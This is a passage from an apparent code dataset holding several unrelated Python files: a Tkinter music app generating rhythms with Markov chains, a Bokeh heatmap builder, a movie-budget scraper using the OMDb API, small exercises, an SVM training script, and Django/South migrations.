[2,16] for 1 croche and 1 ronde\n :return None, drive the audio output\n effect on the program: sound of notes played\n \"\"\"\n for i in range(len(frequence)):\n play_note(frequence[i], duration[i])\n\n\n# General usage functions\n\ndef exists_title(title):\n \"\"\"\n Detects if a title already exists in the collection\n :param str title: title of the searched song\n :return if the title given in parameter already exists\n :rtype boolean\n effect on the program: the function will tell to addition_if_needed if a new title need to appear\n \"\"\"\n for song in glob_collection:\n if title == song[0]:\n return True\n return False\n\n\ndef addition_if_needed(song):\n \"\"\"\n Detect a new song and add it in the collection, add its title in the listbox and place the cursor on it\n :param tuple song: song containing (title, partition)\n :return None, directly add the song to glob_collection\n effect on the program: update the list of songs and override text file with the updated collection\n \"\"\"\n global glob_collection, glob_lbsong\n (title, part) = song\n if exists_title(title) == False:\n glob_collection.append(song)\n glob_lbsong.insert(tk.END, title) # tk.END is a defined constant that we add at the end of a list\n glob_lbsong.select_clear(0, tk.END) # to deselect all\n glob_lbsong.select_set(tk.END) # to select the title of the song going on\n glob_lbsong.see(tk.END) # to bring the scroll bar on the selected title\n write_collection(\"partitions.txt\") # to add the song to the collection\n\n\ndef file_reading(file_name):\n \"\"\"\n Create a collection of songs by reading by pairs of lines the file\n :param str file_name: name of the file that has to be read\n :return collection: collection of the songs contained in the file\n :rtype list\n effect on the program: create a collection of songs [(title1, partition1),(title2, partition2),...]\n \"\"\"\n collection = []\n file = open(file_name, \"r\", encoding=\"utf-8\") # indicate \"r\"ead only\n line1 = file.readline()\n # https://qastack.fr/programming/5843518/remove-all-special-characters-punctuation-and-spaces-from-string\n line1 = re.sub('[^A-Za-z0-9 èéêâ?!#\\'\\-]+', '',\n line1) # + means it replace special characters present at least once\n line2 = file.readline()\n line2 = re.sub('[^A-Za-z0-9 ]+', '', line2)\n while line2 != \"\": # to avoid end of lines and end of files, specific for Mac\n collection.append((line1,\n line2)) # the last character of the line is a carriage return. /!\\ carriage return has a different coding on Windows and on Mac\n line1 = file.readline()\n line1 = re.sub('[^A-Za-z0-9 èéêâ?!#\\'\\-]+', '', line1)\n line2 = file.readline()\n line2 = re.sub('[^A-Za-z0-9 ]+', '', line2)\n file.close()\n return collection\n\n\ndef write_collection(file_name):\n \"\"\"\n Create a text file with the collection of songs by writing pairs of lines\n :param str file_name: name of the file that has to be written\n :return None, create and write in a text file\n effect on the program: override the file containing collection of songs\n \"\"\"\n global glob_collection\n file = open(file_name, 'w', encoding=\"utf-8\") # 'w' open for writing\n for song in glob_collection:\n (title, part) = song\n file.write(title + \"\\n\")\n file.write(part + \"\\n\")\n file.close()\n\n\ndef title_creation(title_current_song, inv, tr):\n \"\"\"\n Create a title for a new song based on the title of the current song and transformation applied\n :param str title_current_song: title of the current song\n :param int inv: ticked box or not, e.g. 
1 if ticked\n :param int tr: value of the transposition, e.g. -2 to down transposed of two half tones\n :return res: the new title\n :rtype str\n effect on the program: new songs have a fitting title\n \"\"\"\n res = title_current_song\n if inv == 1:\n res += \" reverse\"\n if tr != 0:\n res += \" transposed of \" + str(tr)\n return res\n\n\ndef set_croche_duration(duration):\n \"\"\"\n Set the croche duration in seconds based on a string giving the number of ms\n :param str duration: duration of a note in ms\n :return None, directly set the global variable glob_croche_duration\n effect on the program: give the speed of the song, e.g. 250 is two times slower than 125\n \"\"\"\n global glob_croche_duration\n # https://stackoverflow.com/questions/1265665/how-can-i-check-if-a-string-represents-an-int-without-using-try-except\n if duration.isdigit():\n dur = float(duration)\n if 0 < dur < 4000:\n glob_croche_duration = dur / 1000 # to convert seconds in ms\n\n\n# Functions to be called by graphical interface\n\ndef markov_chain_v1():\n \"\"\"\n Creation of a new musical rhythm using Markov chain version 1 based on the full collection\n glob_collection will be used as input (all songs) and output (one song added)\n :return None, to be used by Tkinter menu\n effect on the program: create a new song, add to the text file, add to the listbox\n \"\"\"\n nc = creation_partition_v1(glob_collection)\n dc = creation_duree_v1(glob_collection)\n title = \"#\" + str(len(glob_collection)) + \" New musical rhythm of Markov1\"\n markov_song_v1 = (title, noteduree_to_partition(nc, dc))\n addition_if_needed(markov_song_v1)\n\n\ndef markov_chain_v2():\n \"\"\"\n Creation of a new musical rhythm using Markov chain version 2 based on the full collection\n glob_collection will be used as input (all songs) and output (one song added)\n :return None, to be used by Tkinter menu\n effect on the program: create a new song, add to the text file, add to the listbox\n \"\"\"\n nc = creation_partition_v2(glob_collection)\n dc = creation_duree_v2(glob_collection)\n title = \"#\" + str(len(glob_collection)) + \" New musical rhythm of Markov2\"\n markov_song_v2 = (title, noteduree_to_partition(nc, dc))\n addition_if_needed(markov_song_v2)\n\n\ndef play_song():\n \"\"\"\n Create and play the sound of the song currently selected in the list box\n :return None, drive the audio output\n effect on the program: sound of the song played\n \"\"\"\n song_num = glob_lbsong.curselection()[0]\n partition = glob_collection[song_num][1]\n (n, d) = partition_to_noteduree(partition)\n tr = int(glob_transpo.get())\n n = transposition(n, tr)\n\n inv = int(glob_inv.get())\n if inv == 1:\n n = inversion(n)\n\n title_current_song = glob_collection[song_num][0]\n addition_if_needed((title_creation(title_current_song, inv, tr), noteduree_to_partition(n, d)))\n\n set_croche_duration(glob_croche_dur_sv.get())\n\n f = frequences(n)\n play_notes(f, d)\n\n\n# Graphical interface functions using Tkinter\n\ndef setting_songs_list():\n \"\"\"\n Display the list of songs on the screen using the collection\n :return None, drive on the graphic interface\n effect on the program: full fill the listbox with all the titles\n \"\"\"\n global glob_lbsong\n lb = tk.Listbox(glob_root, width=40, height=6,\n selectmode=tk.SINGLE)\n for element in glob_collection:\n (title, part) = element\n lb.insert(tk.END, title) # tk.END is a defined constant that is added at the end of a list\n lb.select_set(0) # set the default value\n lb.grid(row=0, column=0, rowspan=3)\n 
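# keep a module-level handle on the listbox so play_song() can read the\n    # current selection via glob_lbsong.curselection()\n    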
glob_lbsong = lb\n\n\ndef transformation_settings():\n \"\"\"\n Setting up a cell to enter the value of the transposition, a box to ticked for an inversion,\n a cell to enter the value of the duration of a croche and a button to trigger play\n :return None, set up the graphic interface\n effect on the program: set the graphic interface to transform the play of a partition\n \"\"\"\n global glob_root, glob_transpo\n # transposition\n le = tk.Label(text=\"transposition\")\n le.grid(row=1, column=2, sticky=tk.W)\n e = tk.Entry(width=3, textvariable=glob_transpo)\n e.grid(row=1, column=1, sticky=tk.E)\n glob_transpo.set('0')\n\n # inversion\n cb = tk.Checkbutton(text=\"inversion\", variable=glob_inv)\n cb.grid(row=2, column=1, columnspan=2)\n glob_inv.set('0')\n\n # croche duration\n cd = tk.Label(text=\"croche duration in ms\")\n cd.grid(row=0, column=2, sticky=tk.W)\n d = tk.Entry(width=5, textvariable=glob_croche_dur_sv)\n d.grid(row=0, column=1, sticky=tk.E)\n glob_croche_dur_sv.set('125')\n\n # play\n bplay = tk.Button(text=\"Play\", command=play_song)\n bplay.grid(row=1, column=3)\n\n\ndef menus_settings():\n \"\"\"\n Setting up the menus to choose to use the Markov chains, to test the loudspeakers and to use different instruments\n :return None, set up the graphic interface\n effect on the program: set the graphic interface regarding top bar menus\n \"\"\"\n global glob_root\n glob_root.title(\"Capucine and Emma\")\n menu_bar = tk.Menu(glob_root)\n glob_root.config(menu=menu_bar)\n\n menu_markov = tk.Menu(menu_bar)\n menu_markov.add_command(label=\"Version 1\", command=markov_chain_v1)\n menu_markov.add_command(label=\"Version 2\", command=markov_chain_v2)\n menu_bar.add_cascade(label=\"Markov chains\", menu=menu_markov)\n\n menu_avance = tk.Menu(menu_bar)\n menu_avance.add_command(label=\"Sound test loudspeakers\", command=sound_test_loudspeakers)\n menu_avance.add_command(label=\"Sound test superposition\", command=sound_test_superposition)\n menu_avance.add_separator()\n menu_avance.add_radiobutton(label=\"Instrument: sinus\", var=glob_instrum, value=\"Sinus\")\n menu_avance.add_radiobutton(label=\"Instrument: rectangles\", var=glob_instrum, value=\"Rectangles\")\n menu_avance.add_radiobutton(label=\"Instrument: organ\", var=glob_instrum, value=\"Organ\")\n menu_avance.add_radiobutton(label=\"Instrument: UFO\", var=glob_instrum, value=\"UFO\")\n glob_instrum.set(\"Sinus\") # set the default value\n menu_bar.add_cascade(label=\"Advanced\", menu=menu_avance)\n\n\ndef canvas_settings():\n \"\"\"\n Define two Canvas to have an area dedicated to the drawings\n :return None, set up the graphic interface\n impact of the program: signals could be draw in these two areas\n \"\"\"\n global glob_canvas1, glob_canvas2\n glob_canvas1 = Canvas(width=600, height=50)\n glob_canvas2 = Canvas(width=600, height=300)\n glob_canvas1.grid(row=3, column=0, columnspan=4)\n glob_canvas2.grid(row=4, column=0, columnspan=4)\n\n\ndef drawing1(signal):\n \"\"\"\n Draw the general signal of a note on a coordinate system\n :param np.array signal: signal of a note between -1 and 1\n :return None, drive on the graphic interface\n effect on the program: display a drawing of the signal attitude during the first 600ms\n \"\"\"\n glob_canvas1.delete(\"all\")\n # horizontal axis\n glob_canvas1.create_line(0, 27, 600, 27, width=1, fill=\"red\")\n glob_canvas1.create_line(600, 27, 590, 22, width=1, fill=\"red\")\n glob_canvas1.create_line(600, 27, 590, 32, width=1, fill=\"red\")\n for i in range(1, 10):\n t = i / 10\n 
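# canvas1 uses 1 pixel per millisecond, so a tick at t seconds sits at t * 1000 px\n        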
horizontal = int(t * 1000)\n        glob_canvas1.create_line(horizontal, 23, horizontal, 31, width=1, fill=\"red\")\n        legend = \"{0}s\".format(t)\n        glob_canvas1.create_text(horizontal, 36, text=legend, fill=\"black\")\n\n    # vertical axis: amplitude y in [-1, 1] maps to pixel row 24 * (1 - y) + 3\n    glob_canvas1.create_line(0, 3, 0, 51, width=1, fill=\"red\")\n    for i in (-1, 0, 1):\n        vertical = 24 * (1 - i) + 3\n        glob_canvas1.create_line(0, vertical, 4, vertical, width=1, fill=\"red\")\n\n    y = signal[0]\n    vertical_pre = 24 * (1 - y) + 3\n    for h in range(1, 600):\n        t = h / 1000\n        ind = int(t * sample_rate)\n        if ind >= len(signal):\n            break # stop drawing if the signal finishes before 0.6s\n        y = signal[ind]\n        vertical = 24 * (1 - y) + 3\n        glob_canvas1.create_line(h - 1, vertical_pre, h, vertical, width=1, fill=\"blue\")\n        vertical_pre = vertical\n    glob_canvas1.update() # useful for PC ??\n\ndef drawing2(signal):\n    \"\"\"\n    Draw the signal of the beginning of a note on a coordinate system\n    :param np.array signal: signal of a note between -1 and 1\n    :return None, drive on the graphic interface\n    effect on the program: display a drawing of the beginning of the signal;\n    on the horizontal axis, 1 pixel corresponds to 1/sample_rate seconds\n    \"\"\"\n    glob_canvas2.delete(\"all\")\n    # horizontal axis\n    glob_canvas2.create_line(0, 152, 600, 152, width=1, fill=\"red\")\n    glob_canvas2.create_line(600, 152, 590, 142, width=1, fill=\"red\")\n    glob_canvas2.create_line(600, 152, 590, 162, width=1, fill=\"red\")\n    for i in range(1, 100):\n        t = i / 100\n        horizontal = int(t * sample_rate)\n        glob_canvas2.create_line(horizontal + 9, 148, horizontal + 9, 156, width=1, fill=\"red\")\n        legend = \"{0}s\".format(t)\n        glob_canvas2.create_text(horizontal + 9, 161, text=legend, fill=\"black\")\n\n    # vertical axis\n    glob_canvas2.create_line(9, 5, 9, 300, width=1, fill=\"red\")\n    glob_canvas2.create_line(9, 5, 14, 10, width=1, fill=\"red\")\n    glob_canvas2.create_line(9, 5, 4, 10, width=1, fill=\"red\")\n    for i in range(-4, 4):\n        y = i / 4\n        vertical = 149 * (1 - y) + 3\n        glob_canvas2.create_line(4, vertical, 14, vertical, width=1, fill=\"red\")\n        legend = \"{0}\".format(y)\n        glob_canvas2.create_text(24, vertical, text=legend, fill=\"black\")\n\n    y = signal[0]\n    vertical_pre = 149 * (1 - y) + 3\n    last_i = min(len(signal), 600)\n    for i in range(1, last_i):\n        y = signal[i]\n        vertical = 149 * (1 - y) + 3\n        glob_canvas2.create_line(i - 1 + 9, vertical_pre, i + 9, vertical, width=1, fill=\"blue\")\n        vertical_pre = vertical\n    glob_canvas2.update() # useful on PC ??\n\n\ndef draw(signal):\n    \"\"\"\n    Draw the signal on two Canvas\n    :param np.array signal: signal of a note between -1 and 1\n    :return None, drive on the graphic interface\n    effect on the program: display the signal on two drawings with different horizontal axis scales\n    \"\"\"\n    drawing1(signal)\n    drawing2(signal)\n\n\ntransformation_settings()\nmenus_settings()\nglob_collection = file_reading(\"partitions.txt\")\nsetting_songs_list()\ncanvas_settings()\nglob_root.mainloop()\nglob_root.quit()\n","sub_path":"principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":19263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197318978","text":"\"\"\"This is the Bokeh charts interface. It gives you a high level API to build\ncomplex plots in a simple way.\n\nThis is the HeatMap class which lets you build your HeatMap charts just by passing\nthe arguments to the Chart class and calling the proper functions.\n\"\"\"\n#-----------------------------------------------------------------------------\n# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.\n#\n# Powered by the Bokeh Development Team.\n#\n# The full license is in the file LICENCE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\nfrom __future__ import print_function, division\n\nfrom ._builder import Builder, create_and_build\nfrom ._data_adapter import DataAdapter\nfrom ..models import ColumnDataSource, FactorRange, GlyphRenderer, HoverTool\nfrom ..models.glyphs import Rect\n\n#-----------------------------------------------------------------------------\n# Classes and functions\n#-----------------------------------------------------------------------------\n\n\ndef HeatMap(values, xscale=\"categorical\", yscale=\"categorical\",\n            xgrid=False, ygrid=False, **kw):\n    chart = create_and_build(\n        HeatMapBuilder, values, xscale=xscale, yscale=yscale,\n        xgrid=xgrid, ygrid=ygrid, **kw\n    )\n    chart.add_tools(HoverTool(tooltips=[(\"value\", \"@rate\")]))\n    return chart\n\nclass HeatMapBuilder(Builder):\n    \"\"\"This is the HeatMapBuilder class and it is in charge of plotting\n    HeatMap charts in an easy and intuitive way.\n\n    Essentially, it provides a way to ingest the data, make the proper\n    calculations and push the references into a source object.\n    We additionally make calculations for the ranges.\n    And finally add the needed glyphs (rects) taking the references\n    from the source.\n\n    Examples:\n        from collections import OrderedDict\n        from bokeh.charts import HeatMap\n\n        xyvalues = OrderedDict()\n        xyvalues['apples'] = [4,5,8]\n        xyvalues['bananas'] = [1,2,4]\n        xyvalues['pears'] = [6,5,4]\n        hm = HeatMap(xyvalues, title=\"categorical heatmap\", filename=\"cat_heatmap.html\")\n        hm.show()\n    \"\"\"\n\n    def __init__(self, values, legend=False, palette=None, **kws):\n        \"\"\"\n        Args:\n            values (iterable 2d): iterable 2d representing the data series matrix.\n            palette(list, optional): a list containing the colormap as hex values.\n            legend (str, optional): the legend of your plot. The legend content is\n                inferred from the incoming input. It can be ``top_left``,\n                ``top_right``, ``bottom_left``, ``bottom_right``.\n                It is ``top_right`` if you set it to True.\n                Defaults to None.\n            palette(list, optional): a list containing the colormap as\n                hex values.\n\n        Attributes:\n            source (obj): datasource object for your plot,\n                initialized as a dummy None.\n            x_range (obj): x-associated datarange object for your plot,\n                initialized as a dummy None.\n            y_range (obj): y-associated datarange object for your plot,\n                initialized as a dummy None.\n            groups (list): to be filled with the incoming groups of data.\n                Useful for legend construction.\n            data (dict): to be filled with the incoming data and be passed\n                to the ColumnDataSource in each chart inherited class.\n                Needed for _set_And_get method.\n            attr (list): to be filled with the new attributes created after\n                loading the data dict.\n                Needed for _set_And_get method.\n        \"\"\"\n        if not palette:\n            palette = [\"#75968f\", \"#a5bab7\", \"#c9d9d3\", \"#e2e2e2\", \"#dfccce\",\n                       \"#ddb7b1\", \"#cc7878\", \"#933b41\", \"#550b1d\"]\n        super(HeatMapBuilder, self).__init__(values, legend=legend, palette=palette)\n\n\n    def get_data(self):\n        \"\"\"Take the CategoricalHeatMap data from the input **values.\n\n        It calculates the chart properties accordingly, then builds a dict\n        containing references to all the calculated points to be used by\n        the rect glyph inside the ``draw`` method.\n\n        \"\"\"\n        self.catsx = list(self.values.columns)\n        self.catsy = list(self.values.index)\n\n        # Set up the data for plotting. We will need to have values for every\n        # pair of x/y category names. Map the rate to a color.\n        catx = []\n        caty = []\n        color = []\n        rate = []\n        for y in self.catsy:\n            for m in self.catsx:\n                catx.append(m)\n                caty.append(y)\n                rate.append(self.values[m][y])\n\n        # Map each rate onto the palette using the min and max rates\n        factor = len(self._palette) - 1\n        den = max(rate) - min(rate)\n        for y in self.catsy:\n            for m in self.catsx:\n                c = int(round(factor*(self.values[m][y] - min(rate)) / den))\n                color.append(self._palette[c])\n\n        width = [0.95] * len(catx)\n        height = [0.95] * len(catx)\n\n        self.data = dict(catx=catx, caty=caty, color=color, rate=rate,\n                         width=width, height=height)\n\n    def get_source(self):\n        \"\"\"Push the CategoricalHeatMap data into the ColumnDataSource\n        and calculate the proper ranges.\n        \"\"\"\n        self.source = ColumnDataSource(self.data)\n        self.x_range = FactorRange(factors=self.catsx)\n        self.y_range = FactorRange(factors=self.catsy)\n\n    def draw(self):\n        \"\"\"Use the rect glyphs to display the categorical heatmap.\n\n        Takes reference points from data loaded at the ColumnDataSource.\n        \"\"\"\n        glyph = Rect(\n            x=\"catx\", y=\"caty\",\n            width=\"width\", height=\"height\",\n            fill_color=\"color\", fill_alpha=0.7,\n            line_color=\"white\"\n        )\n        renderer = GlyphRenderer(data_source=self.source, glyph=glyph)\n        # TODO: Legend??\n        yield renderer\n\n    def prepare_values(self):\n        \"\"\"Prepare the input data.\n\n        Converts data input (self.values) to a DataAdapter\n        \"\"\"\n        self.values = DataAdapter(self.values, force_alias=True)","sub_path":"bokeh/charts/catheatmap.py","file_name":"catheatmap.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"5026215","text":"#import urllib2\nimport json\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\nimport itertools\nfrom multiprocessing import Pool, Manager\n#output = open(\"/Users/WeiXing/Desktop/movies_budget.txt\", 
\"w\")\n\n#url = \"http://www.the-numbers.com/movie/budgets/all\"\n\n#page = urllib2.urlopen(url)\ndata = list()\n#titles = list()\nnewData = list()\nmanager = Manager()\nmovieMap = manager.dict()\ntitlesLength = dict()\ntitlesContent = dict()\ngenres = list()\ndef generateCSVData(year):\n tmpTitles = []\n for row in table.findAll(\"tr\")[1:]:\n tmpArr = []\n cells = row.findAll(\"td\")\n if(not cells):\n continue\n \n release_date = cells[1].findAll(text=True)[0].encode(\"utf-8\")\n\n if(year is not None and int(release_date.split(\"/\")[2]) != year):\n continue\n\n title = cells[2].findAll(text=True)[0].encode(\"utf-8\")\n budget = cells[3].findAll(text=True)[0].encode(\"utf-8\")\n domestic_gross = cells[4].findAll(text=True)[0].encode(\"utf-8\")\n worldwide_gross = cells[5].findAll(text=True)[0].encode(\"utf-8\")\n\n tmpArr.append(title)\n tmpArr.append(release_date)\n tmpArr.append(budget)\n tmpArr.append(domestic_gross)\n tmpArr.append(worldwide_gross)\n \n #titles.append(title)\n tmpTitles.append(title)\n data.append(tmpArr)\n\n return tmpTitles\n\n\ndef apiCall(title):\n #call api to get supplementary information about the movie\n tmpArr = []\n extra_fields = [\"Genre\", \"Director\", \"Awards\", \"imdbRating\"]\n url = \"http://www.omdbapi.com/?t=\"+title+\"&y=&plot=short&r=json\"\n response = requests.get(url).text\n respDict = json.loads(response)\n if(\"Error\" in respDict):\n print(respDict[\"Error\"])\n for field in extra_fields:\n tmpArr.append(\"None\")\n else:\n for field in extra_fields:\n tmpArr.append(respDict[field].encode(\"utf-8\"))\n movieMap[title] = tmpArr\n\ndef writeToCSV(year):\n #perform data join between info from the html table and the info returned from the api call\n for record in data:\n title = record[0]\n extraInfo = movieMap[title]\n if(extraInfo[3] == \"None\" or extraInfo[3] == \"N/A\"):\n continue\n tokens = extraInfo[0].split(\",\")\n for token in tokens:\n if(token.strip() not in genres):\n genres.append(token.strip())\n newData.append(record+extraInfo)\n\n csvHeader = [\"Title\", \"Release Date\", \"Budget\", \"Domestic Gross\", \"Worldwide Gross\", \"Genre\", \"Director\", \"Awards\", \"imdbRating\"]\n if year is not None:\n with open(\"/Users/WeiXing/Projects/Info5100Project3/movie_budgets/movie_budget_\"+str(year)+\".csv\", \"w\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(csvHeader)\n csvwriter.writerows(newData)\n else:\n with open(\"/Users/WeiXing/Projects/Info5100Project3/movie_budgets/movie_budget_all.csv\", \"w\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(csvHeader)\n csvwriter.writerows(newData)\n\ndef generateAll():\n for year in range(2010, 2016):\n tmpTitles = generateCSVData(year)\n print(\"The length is \"+str(len(tmpTitles)))\n p = Pool(len(tmpTitles))\n p.map(apiCall, tmpTitles)\n p.terminate()\n \n writeToCSV(None)\n\n\nif __name__ == '__main__':\n input = open(\"/Users/WeiXing/Projects/Info5100Project3/movie_budgets.html\", \"r\")\n soup = BeautifulSoup(input)\n\n table = soup.find(\"table\", { \"id\": \"budgets\" })\n #generate csv file for each year respectively\n '''\n for year in range(2010, 2016):\n tmpTitles = generateCSVData(year)\n print(\"The length of titles list is \"+str(len(tmpTitles)))\n p = Pool(len(tmpTitles))\n p.map(apiCall, tmpTitles)\n writeToCSV(year)\n '''\n #generate one csv file containing all the movie records\n generateAll()\n print(genres)\n\n\n\n \n\n\n\n\n\n\n\n\n \n\n 
","sub_path":"processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"458107215","text":"\n\nfrom xai.brain.wordbase.adjectives._wacky import _WACKY\n\n#calss header\nclass _WACKIER(_WACKY, ):\n\tdef __init__(self,): \n\t\t_WACKY.__init__(self)\n\t\tself.name = \"WACKIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"wacky\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_wackier.py","file_name":"_wackier.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199635247","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Challenges of Python from HackerRank.\n\nThis is a basic python challenge specified by `HackerRank`_.\n\n.. _HackerRank:\n https://www.hackerrank.com/challenges/itertools-permutations\n\"\"\"\n\nfrom itertools import permutations\n\ndef main():\n \"\"\"The main routine.\"\"\"\n string, number = input().strip().split()\n\n for element in sorted(list(permutations(list(string), int(number)))):\n print(\"\".join(element))\n\nif __name__ == '__main__':\n main()\n","sub_path":"hackerrank/practice/python/itertools/itertools_permutations.py","file_name":"itertools_permutations.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147179353","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.contrib.gis.db.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('custom_users', '0001_initial'),\n ('interests', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=30)),\n ('subtitle', models.CharField(max_length=50)),\n ('description', models.CharField(max_length=250)),\n ('location', django.contrib.gis.db.models.fields.PointField(srid=4326, null=True, blank=True)),\n ('beggining', models.DateTimeField()),\n ('end', models.DateTimeField(null=True, blank=True)),\n ('cost', models.IntegerField(null=True, blank=True)),\n ('type', models.CharField(max_length=10, choices=[(b'PRIV', b'Private'), (b'PUB', b'Public')])),\n ('min_people', models.IntegerField()),\n ('max_people', models.IntegerField(null=True, blank=True)),\n ('attending', models.ManyToManyField(related_name='event_attending', to='custom_users.CustomUser', blank=True)),\n ('host', models.ForeignKey(related_name='event_host', to='custom_users.CustomUser')),\n ('interest', models.ForeignKey(to='interests.Interest')),\n ],\n options={\n 'verbose_name': 'event',\n 'verbose_name_plural': 'events',\n },\n ),\n ]\n","sub_path":"events/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"481812077","text":"import numpy as np\nimport data_proc\nfrom sklearn.svm import SVC \nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.externals import joblib\n\n'''use sgd with hinge loss to do svm on large data'''\n\ndef svm_train():\n\n\tmodel = 
SVC(verbose=True)\n\ttrain_iterators=data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [2,3,4],svm=True)\n\tfor i, (X_train, Y_train) in enumerate(train_iterators):\n\t\tmodel.fit(X_train,Y_train)\n\t\tjoblib.dump(model, \"svm1.m\")\n\t\n\tclf = joblib.load(\"svm1.m\")\n\ttest_iterators=data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [9],svm=True)\n\tfor i, (X_test, Y_test) in enumerate(test_iterators):\n\t\tY_pred = clf.predict(X_test)\n\t\tprint(accuracy_score(Y_test, Y_pred))\n\ndef svm_predict(X_test):\n\tclf = joblib.load(\"svm.m\")\n\tres = clf.predict(X_test)\n\treturn np.reshape(res,(res.shape[0],1))\n\ndef svm_sgd():\n\tsgd_clf = SGDClassifier(loss=\"hinge\", penalty=\"l2\")\n\tminibatch_train_iterators = data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [1,2,3,4,5,6],sgd=True)\n\n\tfor i, (X_train, y_train) in enumerate(minibatch_train_iterators):\n\t    sgd_clf.partial_fit(X_train, y_train, classes=np.array([0, 1]))\n\t    print(\"{} time\".format(i)) \n\t    #print(\"{} score\".format(sgd_clf.score(X_test, y_test))) \n\tjoblib.dump(sgd_clf, \"svm.m\")\n\n\tclf = joblib.load(\"svm.m\")\n\ttest_iterators = data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [7,8],test=True)\n\tfor i, (X_test, y_test) in enumerate(test_iterators):\n\t\tY_pred = clf.predict(X_test)\n\t\tprint(accuracy_score(y_test, Y_pred))\n\n\n\nif __name__=='__main__':\n\t'''\n\tx_train,y_train,x_test,y_test = data_proc.load_data_grouped('TK_m0000[s20170404 00205000_e20170414 00153000]20170410_1755_46.csv')\n\tsvm_train(x_train,y_train,x_test,y_test)\n\t'''\n\t#svm_sgd()\n\tsvm_train()","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"515154326","text":"def is_anagram(str1, str2):\n    if len(str1) != len(str2):\n        return False\n    char_map = {}\n\n    for char in str1:\n        char_map[char] = char_map[char] + 1 if char in char_map else 1\n\n    for char in str2:\n        if char_map.get(char) is not None and char_map[char] > 0:\n            char_map[char] -= 1\n        else:\n            return False\n    return True\n\n\nprint(is_anagram(\"READ\", \"DEAR\"))\nprint(is_anagram(\"CAST\", \"TASK\"))\n\n\ndef anagram(s1, s2):\n    if len(s1) != len(s2):\n        return False\n    c = [0] * 256  # one counter per possible byte value (ord 0-255)\n    for ch in s1:\n        c[ord(ch)] += 1\n    for ch in s2:\n        if c[ord(ch)] == 0:\n            return False\n        c[ord(ch)] -= 1\n\n    for i in c:\n        if i != 0:\n            return False\n    return True\n\nprint(anagram('read', 'dear'))\n","sub_path":"Interview Questions/Misc/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282757675","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n    def forwards(self, orm):\n        # Deleting field 'SaltCommand.created'\n        db.delete_column(u'main_saltcommand', 'created')\n\n        # Deleting field 'SaltCommand.modified'\n        db.delete_column(u'main_saltcommand', 'modified')\n\n        # Adding field 'SaltCommand.order'\n        db.add_column(u'main_saltcommand', 'order',\n                      self.gf('django.db.models.fields.PositiveIntegerField')(default=1, db_index=True),\n                      keep_default=False)\n\n\n    def backwards(self, orm):\n        # Adding field 'SaltCommand.created'\n        db.add_column(u'main_saltcommand', 'created',\n                      
self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now),\n keep_default=False)\n\n # Adding field 'SaltCommand.modified'\n db.add_column(u'main_saltcommand', 'modified',\n self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now),\n keep_default=False)\n\n # Deleting field 'SaltCommand.order'\n db.delete_column(u'main_saltcommand', 'order')\n\n\n models = {\n u'main.saltarg': {\n 'Meta': {'ordering': \"['order']\", 'object_name': 'SaltArg'},\n 'command': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['main.SaltCommand']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),\n 'value': ('django.db.models.fields.CharField', [], {'max_length': '256'})\n },\n u'main.saltcommand': {\n 'Meta': {'ordering': \"['order']\", 'object_name': 'SaltCommand'},\n 'description': ('django.db.models.fields.TextField', [], {}),\n 'hipchat_notification_msg': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'key': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),\n 'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),\n 'order': 